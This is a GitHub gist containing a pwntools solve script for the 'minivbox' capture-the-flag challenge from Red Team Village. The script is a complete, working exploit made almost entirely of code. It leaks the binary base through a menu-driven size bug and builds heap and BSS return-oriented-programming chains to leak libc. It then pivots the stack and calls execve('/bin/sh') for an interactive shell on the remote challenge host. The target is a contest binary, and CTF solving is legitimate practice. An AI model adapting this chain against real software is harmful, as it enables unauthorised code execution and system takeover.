Skip to content

Instantly share code, notes, and snippets.

@MEhrn00

MEhrn00/minivbox.py

Created August 24, 2021 16:37
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save MEhrn00/8f5c791b060730d222afdc193828b930 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save MEhrn00/8f5c791b060730d222afdc193828b930 to your computer and use it in GitHub Desktop.
Download ZIP
Red Team Village minivbox solve script
Raw
minivbox.py
#!/usr/bin/env python3
from pwn import *
from time import sleep
context.binary = binary = './target'
if args.REMOTE:
p = remote('pwnremote.threatsims.com', 9003)
libc = ELF('./libc-2.31.so', checksec = False)
else:
p = process(binary, env = {'LD_PRELOAD': './libc-2.31.so'})
libc = ELF('./libc-2.31.so', checksec = False)
if args.GDB:
gdb.attach(p)
e = ELF(binary, checksec = False)
# Set size to 24
p.sendlineafter('> ', '3')
p.sendline('24')
p.sendlineafter('> ', '2')
p.sendline('A')
p.sendlineafter('> ', '1')
# Set size to 16
p.sendlineafter('> ', '3')
p.sendline('16')
p.sendlineafter('> ', '1')
# Get leak
p.recv(8)
e.address = u64(p.recv(8)) - e.symbols.handle_read
log.info(f'Binary base => {hex(e.address)}')
rop = ROP(e, checksec = False)
# Set size to 8
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
BSS = 0x53c0
# Heap rop chain to leak libc and write bss rop chain
chain = [
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.got.puts),
p64(e.plt.puts),
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.address + BSS), # pop rdi; ret
p64(e.symbols.stripped_read),
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.address + BSS + 0x8), # /bin/sh
p64(e.symbols.stripped_read),
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.address + BSS + 0x10), # pop rsi; ret
p64(e.symbols.stripped_read),
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.address + BSS + 0x20), # pop rdx; pop rbx; ret
p64(e.symbols.stripped_read),
p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
p64(e.address + BSS + 0x38), # execve
p64(e.symbols.stripped_read),
p64(rop.find_gadget(['pop rbp', 'ret'])[0]),
p64(e.address + BSS - 8),
p64(rop.find_gadget(['leave', 'ret'])[0])
]
for i in chain:
p.sendlineafter('>', '1')
p.sendlineafter('>', '2')
p.sendline(i[:-2])
# Reset
p.sendlineafter('> ', '4')
# Set size to 8
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
# Set size to 6
p.sendlineafter('> ', '3')
p.sendline('6')
p.sendlineafter('> ', '2')
p.sendline(p64(e.address + 0x001687)[:-2]) # pivot
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '2')
p.sendline(p64(e.address + 0x0016f4)[:-2])
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '3')
p.sendline('6')
p.sendlineafter('> ', '2')
p.sendline(p64(e.address + 0x000127a)[:-2])
p.sendlineafter('> ', '1')
leak = u64(p.recvline().strip().ljust(8, b'\0'))
libc.address = leak - libc.symbols.puts
log.info(f'Leaked puts => {hex(leak)}')
log.info(f'Libc base => {hex(libc.address)}')
lrop = ROP(libc)
# Write bss rop chain
p.sendline(p64(rop.find_gadget(['pop rdi', 'ret'])[0]))
p.sendline()
p.sendline(p64(next(libc.search(b'/bin/sh'))))
p.sendline()
p.sendline(p64(lrop.find_gadget(['pop rsi', 'ret'])[0]))
p.sendline()
p.sendline(p64(lrop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]))
p.sendline()
p.sendline(p64(libc.symbols.execve))
p.sendline()
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment